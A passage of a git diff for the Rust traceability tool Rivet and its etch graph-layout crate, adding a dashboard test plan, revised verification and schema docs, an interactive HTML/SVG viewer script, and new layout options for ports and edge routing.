works + +### Accessibility tests + +- [ ] **Step 12: Write accessibility.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; + +test.describe('Accessibility', () => { + test('all pages have valid heading hierarchy', async ({ page }) => { + const views = ['/', '/artifacts', '/stpa', '/validate', '/graph']; + for (const view of views) { + await page.goto(view); + // Should have at least one heading + const headings = await page.locator('h1, h2, h3').count(); + expect(headings).toBeGreaterThan(0); + } + }); + + test('all interactive elements are keyboard accessible', async ({ page }) => { + await page.goto('/artifacts'); + // Tab through page — should reach filter inputs and links + await page.keyboard.press('Tab'); + await page.keyboard.press('Tab'); + const focused = await page.evaluate(() => document.activeElement?.tagName); + expect(['A', 'INPUT', 'BUTTON', 'SELECT']).toContain(focused); + }); + + test('color contrast meets minimum ratio', async ({ page }) => { + await page.goto('/'); + // Check that body text has sufficient contrast against background + const contrast = await page.evaluate(() => { + const body = document.body; + const style = window.getComputedStyle(body); + return { color: style.color, bg: style.backgroundColor }; + }); + // Basic check — ensure colors are not identical + expect(contrast.color).not.toBe(contrast.bg); + }); +}); +``` + +### CI integration + +- [ ] **Step 13: Add Playwright to CI workflow** + +Add to `.github/workflows/ci.yml`: + +```yaml + playwright: + name: Playwright E2E tests + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: dtolnay/rust-toolchain@stable + - uses: Swatinem/rust-cache@v2 + - uses: actions/setup-node@v4 + with: + node-version: '22' + - name: Install Playwright + working-directory: tests/playwright + run: npm ci && npx playwright install chromium --with-deps + - name: Run Playwright tests + working-directory: tests/playwright + run: npx playwright test + - uses: actions/upload-artifact@v4 + if: always() + with: + name: playwright-report + path: tests/playwright/test-results/ +``` + +- [ ] **Step 14: Run full suite locally** + +```bash +cd tests/playwright && npx playwright test +``` + +Expected: All tests pass. Report generated in `test-results/`. + +- [ ] **Step 15: Commit** + +``` +git add tests/playwright/ .github/workflows/ci.yml +git commit -m "test(serve): comprehensive Playwright E2E test suite for dashboard + +Verifies: FEAT-052 +Refs: REQ-007, SC-15" +``` + +--- + +## Task 10: Final integration and cleanup + +- [ ] **Step 1: Run full test suite** + +Run: `cargo test --all` +Expected: All tests pass. + +- [ ] **Step 2: Run clippy** + +Run: `cargo +stable clippy --all-targets -- -D warnings` +Expected: Clean. + +- [ ] **Step 3: Run rivet validate** + +Run: `cargo run --release -- validate` +Expected: PASS (0 warnings). + +- [ ] **Step 4: Manual smoke test** + +Visit all routes, test filter/sort/fold in each view, test print mode, test graph with focus and without, verify URLs are bookmarkable and survive reload. + +- [ ] **Step 5: Update docs/architecture.md** + +Update section 4 (Dashboard Architecture) to document the component kit, print mode, and URL-persisted state pattern. + +- [ ] **Step 6: Final commit** + +``` +git commit -m "docs: update architecture for dashboard component kit and scalability + +Refs: DD-005" +``` + +--- + +## Dependency Graph + +``` +Task 0 (STPA) ──────────────────────────────────────┐ +Task 1 (skeleton + layout) ──→ Task 2 (components) ──┤──→ Task 5 (STPA view) + Task 3 (ViewParams) ──┤──→ Task 6 (artifacts view) + Task 4 (graph fix) ──┤──→ Task 7 (remaining views) + ├──→ Task 8 (print mode) + └──→ Task 9 (Playwright E2E) + Task 10 (integration) +``` + +Tasks 0, 1 can run in parallel. Task 4's etch changes (Steps 1-3) can run in parallel with Task 1, but Task 4 Steps 4-5 (serve-side graph view) depend on Task 1 completing the skeleton. Tasks 2 and 3 depend on Task 1. Tasks 5-8 depend on Tasks 2+3. Task 9 is last. + +**Post-split housekeeping:** Update `safety/stpa/control-structure.yaml` — the `CTRL-DASH` controller's `source-file` field should change from `rivet-cli/src/serve.rs` to `rivet-cli/src/serve/mod.rs`. + +--- + +## Key Design Decisions + +1. **Server-side filtering over client-side** — HTMX re-renders HTML fragments server-side. No client-side JS state to manage. URL is always the source of truth. Note: this replaces the current instant client-side `filterTable()` JS with a server round-trip. To maintain perceived responsiveness, add `hx-trigger="keyup changed delay:300ms"` on text inputs so HTMX debounces the request. + +2. **Composable components, not a template engine** — Functions that return `String` HTML fragments. No Tera/Handlebars dependency. Stays consistent with the existing pattern. + +3. **Node budget, not pagination for graphs** — Graphs don't paginate well. Instead, cap the node count and require filters/focus to narrow. Show a helpful message when budget exceeded. + +4. **Print mode via query param, not separate routes** — `?print=1` on any existing URL gives a clean printable version. No route duplication. + +5. **Incremental extraction** — Move one view at a time from serve.rs to serve/views/. Dashboard stays functional at every step. diff --git a/docs/schemas.md b/docs/schemas.md index e718506..c3656fe 100644 --- a/docs/schemas.md +++ b/docs/schemas.md @@ -13,11 +13,15 @@ loads `common` plus one or more domain schemas. | `common` | 0.1.0 | -- | -- | Base fields and link types | | `dev` | 0.1.0 | 3 | 2 | Software development tracking | | `stpa` | 0.1.0 | 10 | 7 | STPA safety analysis | -| `aspice` | 0.2.0 | 14 | 10 | Automotive SPICE V-model | -| `cybersecurity` | 0.1.0 | 10 | 10 | Cybersecurity (SEC.1-4 / ISO 21434) | +| `aspice` | 0.2.0 | 13 | 10 | Automotive SPICE V-model | +| `cybersecurity` | 0.1.0 | 8 | 10 | Cybersecurity (SEC.1-4 / ISO 21434) | +| `aadl` | 0.1.0 | 4 | 1 | AADL architecture (spar integration) | Schemas are located in `schemas/` relative to the project directory. +> **Do not hardcode type or rule counts in other documents.** Use `rivet schema list` +> for current counts. The table above is maintained here as the single source of truth. + --- ## Common Schema diff --git a/docs/verification.md b/docs/verification.md index 380f20f..3895951 100644 --- a/docs/verification.md +++ b/docs/verification.md @@ -25,189 +25,64 @@ as specified by [[REQ-014]]. ## 2. Test Suite Overview -Rivet's test suite consists of 59 tests across four categories: - -| Level | Category | Test Count | File | -|-------|---------------------|------------|-------------------------------| -| SWE.4 | Unit tests | 30 | `rivet-core/src/*.rs` | -| SWE.4 | Property tests | 6 | `rivet-core/tests/proptest_core.rs` | -| SWE.5 | Integration tests | 18 | `rivet-core/tests/integration.rs` | -| SWE.5 | STPA roundtrip | 5 | `rivet-core/tests/stpa_roundtrip.rs` | -| SWE.6 | Benchmarks | 7 groups | `rivet-core/benches/` | -| SWE.6 | CI quality gates | 10 stages | `.github/workflows/` | - -All 59 tests pass. Zero failures, zero ignored. +The test suite is organized by ASPICE verification level. Actual test counts +are maintained by the test runner — run `cargo test -- --list` for the +current count. + +| Level | Category | Location | +|-------|---------------------|---------------------------------------| +| SWE.4 | Unit tests | `rivet-core/src/*.rs` (`#[cfg(test)]` modules) | +| SWE.4 | Property tests | `rivet-core/tests/proptest_core.rs` | +| SWE.4 | Fuzz targets | `fuzz/fuzz_targets/` | +| SWE.5 | Integration tests | `rivet-core/tests/integration.rs` | +| SWE.5 | STPA roundtrip | `rivet-core/tests/stpa_roundtrip.rs` | +| SWE.6 | Benchmarks | `rivet-core/benches/` | +| SWE.6 | CI quality gates | `.github/workflows/` | ## 3. Unit Tests (SWE.4) Unit tests live inside `#[cfg(test)]` modules within rivet-core source files. -They verify individual module behavior in isolation. - -### 3.1 Diff Module (5 tests) - -File: `rivet-core/src/diff.rs` - -| Test | Verifies | -|-------------------------------|---------------| -| `empty_diff` | [[REQ-001]] | -| `identical_stores` | [[REQ-001]] | -| `added_artifact` | [[REQ-001]] | -| `removed_artifact` | [[REQ-001]] | -| `modified_title` | [[REQ-001]] | - -The diff module computes structural differences between two store snapshots. -These tests verify that added, removed, modified, and unchanged artifacts are -correctly classified. - -### 3.2 Document Module (9 tests) - -File: `rivet-core/src/document.rs` - -| Test | Verifies | -|-----------------------------------|---------------| -| `parse_frontmatter` | [[REQ-001]] | -| `missing_frontmatter_is_error` | [[REQ-001]] | -| `document_store` | [[REQ-001]] | -| `render_html_headings` | [[REQ-007]] | -| `render_html_resolves_refs` | [[REQ-007]] | -| `default_doc_type_when_omitted` | [[REQ-001]] | -| `multiple_refs_on_one_line` | [[REQ-001]] | -| `extract_references_from_body` | [[REQ-004]] | -| `extract_sections_hierarchy` | [[REQ-007]] | - -Document tests verify YAML frontmatter parsing, wiki-link reference extraction, -HTML rendering, and the document store. - -### 3.3 Results Module (9 tests) +They verify individual module behavior in isolation. Key modules tested: -File: `rivet-core/src/results.rs` +- **diff** (`diff.rs`) — structural diff between store snapshots. Verifies [[REQ-001]]. +- **document** (`document.rs`) — YAML frontmatter, wiki-link references, HTML rendering. Verifies [[REQ-001]], [[REQ-007]]. +- **results** (`results.rs`) — test results model, status predicates, YAML roundtrip. Verifies [[REQ-009]]. +- **reqif** (`reqif.rs`) — ReqIF 1.2 XML roundtrip, export validity, minimal parse. Verifies [[REQ-005]]. +- **coverage** (`coverage.rs`) — traceability coverage computation, edge cases. Verifies [[REQ-004]]. +- **store** (`store.rs`) — insert, lookup, by-type indexing, upsert. Verifies [[REQ-001]]. -| Test | Verifies | -|-----------------------------------|---------------| -| `test_status_display` | [[REQ-009]] | -| `test_status_is_pass_fail` | [[REQ-009]] | -| `test_result_store_insert_and_sort` | [[REQ-009]] | -| `test_latest_for` | [[REQ-009]] | -| `test_history_for` | [[REQ-009]] | -| `test_summary` | [[REQ-009]] | -| `test_load_results_empty_dir` | [[REQ-009]] | -| `test_load_results_nonexistent_dir` | [[REQ-009]] | -| `test_roundtrip_yaml` | [[REQ-009]] | - -These tests verify the test results model: status enum behavior, result store -ordering, latest/history queries, aggregate statistics, YAML roundtrip -serialization, and edge cases (empty/nonexistent directories). - -### 3.4 ReqIF Module (3 tests) - -File: `rivet-core/src/reqif.rs` - -| Test | Verifies | -|-----------------------------------|---------------| -| `test_export_produces_valid_xml` | [[REQ-005]] | -| `test_parse_minimal_reqif` | [[REQ-005]] | -| `test_roundtrip` | [[REQ-005]] | - -These tests verify that ReqIF 1.2 XML export produces valid structure, that -minimal ReqIF documents can be parsed, and that full roundtrip -(export then import) preserves all artifact data. - -### 3.5 Coverage Module (4 tests) - -File: `rivet-core/src/coverage.rs` - -| Test | Verifies | -|-----------------------------------|---------------| -| `full_coverage` | [[REQ-004]] | -| `partial_coverage` | [[REQ-004]] | -| `zero_artifacts_gives_100_percent` | [[REQ-004]] | -| `to_json_roundtrip` | [[REQ-004]] | - -Coverage tests verify the traceability coverage computation engine: full -coverage detection, partial coverage percentage calculation, vacuous truth -for empty sets, and JSON serialization roundtrip. +Test-to-requirement tracing is done via `// rivet: verifies` markers in test +source code (once [[FEAT-043]] ships) or via the TEST-* artifacts in +`artifacts/verification.yaml`. ## 4. Property-Based Tests (SWE.4) File: `rivet-core/tests/proptest_core.rs` Property tests use proptest to verify invariants with randomized inputs. -Each test runs 30-50 cases with generated data. - -| Test | Verifies | -|-----------------------------------|----------------------| -| `prop_store_insert_all_retrievable` | [[REQ-001]] | -| `prop_store_rejects_duplicates` | [[REQ-001]] | -| `prop_schema_merge_idempotent` | [[REQ-010]] | -| `prop_link_graph_backlink_symmetry` | [[REQ-004]] | -| `prop_validation_determinism` | [[REQ-004]] | -| `prop_store_types_match_inserted` | [[REQ-001]] | - -These properties verify: - -- **Store consistency** -- Inserting N unique artifacts yields a store of - size N where every artifact is retrievable by ID and by-type counts match. -- **Duplicate rejection** -- Inserting the same ID twice is rejected. -- **Schema merge idempotence** -- Merging a schema with itself produces the - same artifact types, link types, and inverse maps. -- **Backlink symmetry** -- Every forward link in the graph has a corresponding - backlink at the target node. -- **Validation determinism** -- Running `validate()` twice on identical inputs - produces identical diagnostic output. -- **Type iterator correctness** -- The `types()` iterator returns exactly the - set of types that have artifacts in the store. +CI runs at 1000 cases per property via `PROPTEST_CASES` env var. + +Key properties verified: + +- **Store consistency** — inserting N unique artifacts yields retrievable store of size N +- **Duplicate rejection** — inserting the same ID twice is rejected +- **Schema merge idempotence** — merging a schema with itself preserves all types and inverses +- **Backlink symmetry** — every forward link has a corresponding backlink ([[REQ-004]]) +- **Validation determinism** — `validate()` on identical inputs produces identical output +- **Type iterator correctness** — `types()` returns exactly the set of inserted types ## 5. Integration Tests (SWE.5) -File: `rivet-core/tests/integration.rs` +Files: `rivet-core/tests/integration.rs`, `rivet-core/tests/stpa_roundtrip.rs` Integration tests exercise cross-module pipelines: loading real schemas, building stores, computing link graphs, running validation, and computing traceability matrices. -| Test | Verifies | -|-----------------------------------|-----------------------------| -| `test_dogfood_validate` | [[REQ-001]], [[REQ-010]] | -| `test_generic_yaml_roundtrip` | [[REQ-001]] | -| `test_schema_merge_preserves_types` | [[REQ-010]], [[REQ-003]] | -| `test_cybersecurity_schema_merge` | [[REQ-016]] | -| `test_traceability_matrix` | [[REQ-004]] | -| `test_traceability_matrix_empty` | [[REQ-004]] | -| `test_query_filters` | [[REQ-007]] | -| `test_link_graph_integration` | [[REQ-004]] | -| `test_aspice_traceability_rules` | [[REQ-003]], [[REQ-015]] | -| `test_store_upsert_overwrites` | [[REQ-001]] | -| `test_store_upsert_type_change` | [[REQ-001]] | -| `test_reqif_roundtrip` | [[REQ-005]] | -| `test_reqif_store_integration` | [[REQ-005]] | -| `test_diff_identical_stores` | [[REQ-001]] | -| `test_diff_added_artifact` | [[REQ-001]] | -| `test_diff_removed_artifact` | [[REQ-001]] | -| `test_diff_modified_artifact` | [[REQ-001]] | -| `test_diff_diagnostic_changes` | [[REQ-004]] | - -### 5.1 Dogfood Validation - -The `test_dogfood_validate` test loads Rivet's own `rivet.yaml`, schemas, and -artifacts, then runs the full validation pipeline. This test must pass with -zero errors. It verifies that Rivet can validate itself -- the most direct -form of dogfooding. - -### 5.2 STPA Roundtrip Tests - -File: `rivet-core/tests/stpa_roundtrip.rs` - -| Test | Verifies | -|-----------------------------------|---------------| -| `test_stpa_schema_loads` | [[REQ-002]] | -| `test_store_insert_and_lookup` | [[REQ-001]] | -| `test_duplicate_id_rejected` | [[REQ-001]] | -| `test_broken_link_detected` | [[REQ-004]] | -| `test_validation_catches_unknown_type` | [[REQ-004]], [[REQ-010]] | - -These tests verify STPA-specific schema loading and validation: that all -STPA artifact types and link types are present after schema load, that basic -store operations work, and that broken links and unknown types are detected. +The **dogfood validation** test (`test_dogfood_validate`) loads Rivet's own +`rivet.yaml`, schemas, and artifacts, then runs the full validation pipeline. +This test must pass with zero errors — it verifies that Rivet can validate +itself, the most direct form of dogfooding. ## 6. OSLC Integration Tests @@ -259,25 +134,117 @@ a qualification gate: | `deny` | `cargo deny` | License violations, duplicate deps | | `vet` | `cargo vet` | Supply chain verification | | `coverage` | `cargo llvm-cov` | Code coverage metrics | -| `msrv` | MSRV 1.85 check | Backward compatibility ([[REQ-011]]) | - -## 9. Requirement-to-Test Mapping Summary - -| Requirement | Unit | Integration | Property | Total | -|---------------|------|-------------|----------|-------| -| [[REQ-001]] | 14 | 7 | 3 | 24 | -| [[REQ-002]] | 0 | 1 | 0 | 1 | -| [[REQ-003]] | 0 | 2 | 0 | 2 | -| [[REQ-004]] | 5 | 5 | 2 | 12 | -| [[REQ-005]] | 3 | 2 | 0 | 5 | -| [[REQ-006]] | 0 | 0 (gated) | 0 | 0+ | -| [[REQ-007]] | 3 | 1 | 0 | 4 | -| [[REQ-009]] | 9 | 0 | 0 | 9 | -| [[REQ-010]] | 0 | 2 | 1 | 3 | -| [[REQ-015]] | 0 | 1 | 0 | 1 | -| [[REQ-016]] | 0 | 1 | 0 | 1 | - -Requirements without direct test coverage ([[REQ-006]], [[REQ-008]], -[[REQ-011]], [[REQ-012]], [[REQ-013]], [[REQ-014]]) are verified through CI -quality gates, feature-gated integration tests, or benchmark KPIs rather than -unit tests. +| `msrv` | MSRV 1.89 check | Backward compatibility ([[REQ-011]]) | + +## 9. Requirement-to-Test Mapping + +Test-to-requirement traceability is tracked via TEST-* artifacts in +`artifacts/verification.yaml` and (once implemented) via `// rivet: verifies` +source markers scanned by [[FEAT-043]]. + +Run `rivet coverage` to see the current requirement-to-test coverage. + +> **Do not hardcode counts in documentation.** Test counts, artifact counts, +> schema type counts, and similar numbers go stale immediately. Use CLI +> commands (`rivet stats`, `rivet schema list`, `cargo test -- --list`) as the +> source of truth. The only exception is the schema reference table in +> [schemas.md](schemas.md), which is maintained as a single canonical location. + +## 10. Formal Verification Strategy (Phase 3) + +[[REQ-030]] specifies formal correctness guarantees at three levels, forming a +verification pyramid that builds on the existing test infrastructure. + +### 10.1 Kani Bounded Model Checking + +[[DD-025]], [[FEAT-049]] + +Kani proof harnesses exhaustively check all inputs within configurable bounds. +Each harness proves a specific property about the actual compiled code (per +SC-14). Target: 10-15 harnesses covering: + +| Target | Property proven | +|--------|----------------| +| `parse_artifact_ref()` | No panics for any `&str` input | +| `Schema::merge()` | No panics, all input types preserved | +| `LinkGraph::build()` | No panics for any valid store+schema | +| `LinkGraph::build()` | Backlink symmetry: forward A→B implies backward B←A | +| `validate()` cardinality | All `Cardinality` enum arms handled | +| `has_cycles()` | Terminates for graphs up to N nodes | +| `reachable()` | Result is a subset of all nodes, terminates | +| `orphans()` | Orphan set has no links or backlinks | +| `detect_circular_deps()` | DFS terminates for any graph | +| `Store::insert()` | Duplicate returns error | +| `compute_coverage()` | Coverage always in `[0.0, 1.0]` | + +CI integration: new `kani` job using `model-checking/kani-github-action`. + +### 10.2 Verus Functional Correctness + +[[DD-026]], [[FEAT-050]] + +Inline `requires`/`ensures` annotations proving: + +- **Soundness:** If `validate()` returns no error diagnostics, all + traceability rules are satisfied for the given store and schema. +- **Completeness:** For every traceability rule violation in the store, + `validate()` emits a corresponding diagnostic. +- **Backlink symmetry:** `links_from(A)` contains B ↔ `backlinks_to(B)` contains A. +- **Conditional rule consistency:** If two rules can co-fire on one artifact, + their `then` requirements do not contradict. +- **Reachability correctness:** `reachable()` returns exactly the transitive + closure of the specified link type. + +### 10.3 Rocq Metamodel Specification + +[[DD-027]], [[FEAT-051]] + +Schema semantics modeled in Rocq via coq-of-rust translation: + +- **Schema satisfiability:** Given a set of traceability rules and conditional + rules, prove that at least one valid artifact configuration exists (the + rules are not contradictory). +- **Monotonicity:** Adding an artifact to a valid store preserves validity of + previously valid artifacts (or formally characterizes when it doesn't). +- **Well-foundedness:** The traceability rule evaluation terminates for any + finite set of artifacts and rules. +- **ASPICE V-model completeness:** The `aspice.yaml` schema's rules enforce + the complete V-model chain from stakeholder requirements through system + and software requirements to design, implementation, and verification. + +### 10.4 Verification Pyramid + +``` + ╱╲ + ╱ ╲ Rocq / coq-of-rust + ╱ TQ ╲ Metamodel proofs: satisfiability, monotonicity + ╱──────╲ (ISO 26262 TCL 1 evidence) + ╱ ╲ + ╱ Verus ╲ Functional correctness + ╱ sound + ╲ validate() is sound + complete + ╱ complete ╲ (inline Rust proofs, SMT-backed) + ╱────────────────╲ +╱ ╲ +╱ Kani + proptest ╲ Panic freedom + property testing +╱ + fuzzing + Miri ╲ (automated, CI-integrated) +╱──────────────────────╲ +``` + +Each layer builds on the one below. The existing test infrastructure (proptest, +fuzzing, Miri, mutation testing) forms the base. Kani fills gaps with exhaustive +bounded checking. Verus adds provable correctness. Rocq provides the deepest +assurance for tool qualification. + +**STPA coverage:** H-12 (proof-model divergence), SC-14 (proofs verify actual +implementation). + +## 11. Phase 3 Verification Approach + +Each phase 3 workstream adds verification at the appropriate level: + +- **[[REQ-023]] Conditional rules** — proptest for rule evaluation determinism, Kani for condition matching panic freedom, Rocq for rule consistency proofs +- **[[REQ-025]] needs.json import** — fuzz target for malformed JSON, integration tests with real SCORE data +- **[[REQ-028]] rowan parser** — fuzz target for arbitrary byte input, Kani for parser panic freedom, unit tests for each syntax kind +- **[[REQ-029]] salsa incremental** — proptest comparing incremental vs full validation results, Verus soundness proof +- **[[REQ-030]] formal verification** — the Kani/Verus/Rocq harnesses ARE the verification +- **[[REQ-031]] CLI mutations** — proptest for random mutation sequences never producing invalid YAML, integration tests for all rejection cases diff --git a/etch/src/html.rs b/etch/src/html.rs new file mode 100644 index 0000000..b7d2104 --- /dev/null +++ b/etch/src/html.rs @@ -0,0 +1,167 @@ +//! Interactive HTML wrapper for etch SVG output. +//! +//! Produces a self-contained HTML document with embedded SVG and JavaScript +//! for pan, zoom, selection, and group highlighting. No external dependencies. + +use crate::layout::GraphLayout; +use crate::svg::{SvgOptions, render_svg}; + +/// Options for HTML output. +#[derive(Debug, Clone)] +pub struct HtmlOptions { + /// Page title. + pub title: String, + /// Show minimap (Phase 3b — reserved). + pub minimap: bool, + /// Enable search (Phase 3b — reserved). + pub search: bool, + /// Show legend (Phase 3b — reserved). + pub legend: bool, + /// Enable semantic zoom (CSS classes at low zoom levels). + pub semantic_zoom: bool, +} + +impl Default for HtmlOptions { + fn default() -> Self { + Self { + title: "Graph".into(), + minimap: true, + search: true, + legend: true, + semantic_zoom: true, + } + } +} + +/// Render a [`GraphLayout`] as a self-contained interactive HTML document. +/// +/// The returned string is a complete HTML page with embedded SVG and +/// JavaScript for pan, zoom, selection, and group highlighting. +pub fn render_html( + layout: &GraphLayout, + svg_options: &SvgOptions, + html_options: &HtmlOptions, +) -> String { + let svg_content = render_svg(layout, svg_options); + let js = include_str!("html_interactivity.js"); + let title = &html_options.title; + + format!( + r#" + + + + +{title} + + + +
+{svg_content} +
+ + +"# + ) +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::layout::{EdgeInfo, LayoutOptions, NodeInfo, layout}; + use petgraph::Graph; + use petgraph::graph::{EdgeIndex, NodeIndex}; + + fn build_test_layout() -> GraphLayout { + let mut g = Graph::new(); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "link"); + + layout( + &g, + &|_idx: NodeIndex, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![], + }, + &|_idx: EdgeIndex, e: &&str| EdgeInfo { + label: e.to_string(), + source_port: None, + target_port: None, + }, + &LayoutOptions::default(), + ) + } + + #[test] + fn html_contains_svg_and_script() { + let gl = build_test_layout(); + let html = render_html(&gl, &SvgOptions::default(), &HtmlOptions::default()); + assert!(html.contains("")); + assert!(html.contains("")); + assert!(html.contains("")); + } + + #[test] + fn html_contains_interactivity_code() { + let gl = build_test_layout(); + let html = render_html(&gl, &SvgOptions::default(), &HtmlOptions::default()); + assert!(html.contains("mousedown"), "should have pan handler"); + assert!(html.contains("wheel"), "should have zoom handler"); + assert!(html.contains("etch-select"), "should have selection event"); + assert!(html.contains("viewBox"), "should manipulate viewBox"); + } + + #[test] + fn html_has_semantic_zoom_css() { + let gl = build_test_layout(); + let html = render_html(&gl, &SvgOptions::default(), &HtmlOptions::default()); + assert!(html.contains("zoom-low"), "should have zoom-low class"); + assert!( + html.contains("zoom-overview"), + "should have zoom-overview class" + ); + } + + #[test] + fn html_has_selection_css() { + let gl = build_test_layout(); + let html = render_html(&gl, &SvgOptions::default(), &HtmlOptions::default()); + assert!( + html.contains(".node.selected rect"), + "should have selection CSS" + ); + } + + #[test] + fn html_title_customizable() { + let gl = build_test_layout(); + let opts = HtmlOptions { + title: "My Architecture".into(), + ..Default::default() + }; + let html = render_html(&gl, &SvgOptions::default(), &opts); + assert!(html.contains("My Architecture")); + } +} diff --git a/etch/src/html_interactivity.js b/etch/src/html_interactivity.js new file mode 100644 index 0000000..c07b00f --- /dev/null +++ b/etch/src/html_interactivity.js @@ -0,0 +1,128 @@ +// etch interactive SVG viewer — pan, zoom, selection, group highlight +(function() { + const container = document.getElementById('container'); + const svg = container.querySelector('svg'); + if (!svg) return; + + // Parse initial viewBox + const vb = svg.getAttribute('viewBox').split(' ').map(Number); + let [vx, vy, vw, vh] = vb; + const origVw = vw, origVh = vh; + + // State + let isPanning = false; + let panStart = { x: 0, y: 0 }; + let scale = 1; + + // --- Pan --- + svg.addEventListener('mousedown', e => { + if (e.target.closest('.node')) return; // don't pan when clicking nodes + isPanning = true; + panStart = { x: e.clientX, y: e.clientY }; + svg.style.cursor = 'grabbing'; + }); + + window.addEventListener('mousemove', e => { + if (!isPanning) return; + const dx = (e.clientX - panStart.x) * (vw / svg.clientWidth); + const dy = (e.clientY - panStart.y) * (vh / svg.clientHeight); + vx -= dx; + vy -= dy; + panStart = { x: e.clientX, y: e.clientY }; + updateViewBox(); + }); + + window.addEventListener('mouseup', () => { + isPanning = false; + svg.style.cursor = 'grab'; + }); + + // --- Zoom (wheel) --- + svg.addEventListener('wheel', e => { + e.preventDefault(); + const zoomFactor = e.deltaY > 0 ? 1.1 : 0.9; + + // Zoom around cursor position + const rect = svg.getBoundingClientRect(); + const mx = (e.clientX - rect.left) / rect.width; + const my = (e.clientY - rect.top) / rect.height; + + const newVw = vw * zoomFactor; + const newVh = vh * zoomFactor; + + vx += (vw - newVw) * mx; + vy += (vh - newVh) * my; + vw = newVw; + vh = newVh; + scale = origVw / vw; + + updateViewBox(); + updateSemanticZoom(); + }, { passive: false }); + + // --- Selection --- + svg.addEventListener('click', e => { + const nodeEl = e.target.closest('.node'); + if (!nodeEl) { + if (!e.ctrlKey && !e.metaKey) { + svg.querySelectorAll('.node.selected').forEach(n => n.classList.remove('selected')); + } + return; + } + + if (e.ctrlKey || e.metaKey) { + nodeEl.classList.toggle('selected'); + } else { + svg.querySelectorAll('.node.selected').forEach(n => n.classList.remove('selected')); + nodeEl.classList.add('selected'); + } + + // If it's a container, highlight children + if (nodeEl.classList.contains('container')) { + const containerId = nodeEl.getAttribute('data-id'); + if (containerId) { + // Emit event for integration + svg.dispatchEvent(new CustomEvent('etch-container-select', { + detail: { id: containerId } + })); + } + } + + // Emit selection event + const selected = Array.from(svg.querySelectorAll('.node.selected')) + .map(n => n.getAttribute('data-id')) + .filter(Boolean); + svg.dispatchEvent(new CustomEvent('etch-select', { + detail: { ids: selected } + })); + }); + + // --- URL highlight parameter --- + const params = new URLSearchParams(window.location.search); + const highlightId = params.get('highlight'); + if (highlightId) { + const node = svg.querySelector(`.node[data-id="${CSS.escape(highlightId)}"]`); + if (node) { + node.classList.add('selected'); + // Pan to highlighted node + const rect = node.querySelector('rect'); + if (rect) { + const nx = parseFloat(rect.getAttribute('x')); + const ny = parseFloat(rect.getAttribute('y')); + vx = nx - vw / 4; + vy = ny - vh / 4; + updateViewBox(); + } + } + } + + // --- Semantic zoom --- + function updateSemanticZoom() { + svg.classList.toggle('zoom-low', scale < 0.5); + svg.classList.toggle('zoom-overview', scale < 0.25); + } + + function updateViewBox() { + svg.setAttribute('viewBox', `${vx} ${vy} ${vw} ${vh}`); + } +})(); diff --git a/etch/src/layout.rs b/etch/src/layout.rs index 4256b08..2cca02b 100644 --- a/etch/src/layout.rs +++ b/etch/src/layout.rs @@ -29,6 +29,16 @@ pub enum RankDirection { LeftToRight, } +/// Edge routing strategy. +#[derive(Debug, Clone, Copy, Default, PartialEq, Eq)] +pub enum EdgeRouting { + /// Orthogonal routing with right-angle bends. + #[default] + Orthogonal, + /// Cubic bezier curves (legacy behavior). + CubicBezier, +} + /// Options that control the layout algorithm. #[derive(Debug, Clone)] pub struct LayoutOptions { @@ -45,6 +55,21 @@ pub struct LayoutOptions { /// Force nodes whose `node_type` matches a key to a specific rank. /// Ranks are 0-based; lower ranks are rendered closer to the root. pub type_ranks: HashMap, + /// Padding inside container nodes (px). + pub container_padding: f64, + /// Height of the container header (for the label) (px). + pub container_header: f64, + /// Maximum number of nodes before the layout bails out with a + /// sentinel "budget exceeded" node. `None` means no limit. + pub max_nodes: Option, + /// Edge routing strategy. + pub edge_routing: EdgeRouting, + /// Penalty for each bend in orthogonal routing (higher = fewer bends). + pub bend_penalty: f64, + /// Gap between parallel edge segments (px). + pub edge_separation: f64, + /// Minimum straight stub length leaving a port before any bend (px). + pub port_stub_length: f64, } impl Default for LayoutOptions { @@ -56,10 +81,97 @@ impl Default for LayoutOptions { node_separation: 40.0, rank_direction: RankDirection::default(), type_ranks: HashMap::new(), + container_padding: 20.0, + container_header: 30.0, + max_nodes: None, + edge_routing: EdgeRouting::default(), + bend_penalty: 20.0, + edge_separation: 4.0, + port_stub_length: 10.0, } } } +// --------------------------------------------------------------------------- +// Port types +// --------------------------------------------------------------------------- + +/// Side of the node where a port is positioned. +#[derive(Debug, Clone, Copy, Default, PartialEq, Eq)] +pub enum PortSide { + Left, + Right, + Top, + Bottom, + /// Let the layout algorithm choose based on direction. + #[default] + Auto, +} + +/// Direction of data flow through a port. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum PortDirection { + In, + Out, + InOut, +} + +/// Visual category of a port (determines color in SVG rendering). +#[derive(Debug, Clone, Copy, Default, PartialEq, Eq)] +pub enum PortType { + /// Data port (blue #4a90d9). + #[default] + Data, + /// Event port (orange #e67e22). + Event, + /// Event-data port (green #27ae60). + EventData, + /// Access port (gray #999). + Access, + /// Feature group (purple #9b59b6). + Group, + /// Abstract feature (dark gray #666). + Abstract, +} + +/// Display-level information about a port on a node. +#[derive(Debug, Clone)] +pub struct PortInfo { + /// Unique identifier within the owning node. + pub id: String, + /// Label rendered next to the port circle. + pub label: String, + /// Which side of the node this port appears on. + pub side: PortSide, + /// Direction of data flow. + pub direction: PortDirection, + /// Visual category (determines color). + pub port_type: PortType, +} + +/// A positioned port on a layout node. +#[derive(Debug, Clone)] +pub struct LayoutPort { + /// Port identifier. + pub id: String, + /// Label text. + pub label: String, + /// X coordinate of port center (absolute). + pub x: f64, + /// Y coordinate of port center (absolute). + pub y: f64, + /// Which side of the node. + pub side: PortSide, + /// Direction indicator. + pub direction: PortDirection, + /// Visual type. + pub port_type: PortType, +} + +// --------------------------------------------------------------------------- +// Node / Edge / Layout types +// --------------------------------------------------------------------------- + /// Display-level information about a node supplied by the caller. #[derive(Debug, Clone)] pub struct NodeInfo { @@ -71,6 +183,14 @@ pub struct NodeInfo { pub node_type: String, /// Optional secondary text (e.g. a title below the ID). pub sublabel: Option, + /// Optional parent container ID. When set, this node is placed + /// *inside* the container whose [`NodeInfo::id`] matches. The layout + /// algorithm lays out each container's children independently and then + /// sizes the container to fit its content. + pub parent: Option, + /// Ports on this node. Empty for nodes without explicit ports; + /// edges then connect to node centers (backward compatible). 